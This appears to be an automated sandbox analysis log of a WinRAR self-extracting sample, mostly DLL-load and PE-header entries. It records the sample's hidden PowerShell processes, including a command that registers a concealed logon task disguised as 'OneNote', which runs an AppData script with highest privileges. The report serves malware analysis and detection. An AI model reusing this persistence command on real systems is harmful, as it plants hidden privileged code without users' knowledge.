    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: file.exeStatic file information: File size 5553078 > 1048576
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000007.00000002.1765118329.00000217EC74D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbq source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbR source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDBM source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdbF source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb$ source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1765118329.00000217EC74D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB" source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFF5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32( source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFF5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb| source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000017.00000002.2234254487.000001DF2EFE0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb; source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb7 source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbS source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdbM source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbI source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbjS source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
    Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1763356691.00000217EA796000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbk source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdbW source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbF source: powershell.exe, 00000017.00000002.2234695420.000001DF2EFFB000.00000004.00000020.00020000.00000000.sdmp
    Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man')
    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6975453
    Source: file.exe | Static PE information: section name: .didat
    Source: file.exe | Static PE information: section name: _RDATA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9BA15BA4 push ds; ret 7_2_00007FFD9BA15BD2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9BA15B3D push ss; ret 7_2_00007FFD9BA15B62
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9BA12335 push eax; iretd 7_2_00007FFD9BA1237D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9BA192D7 push es; iretd 7_2_00007FFD9BA192DA
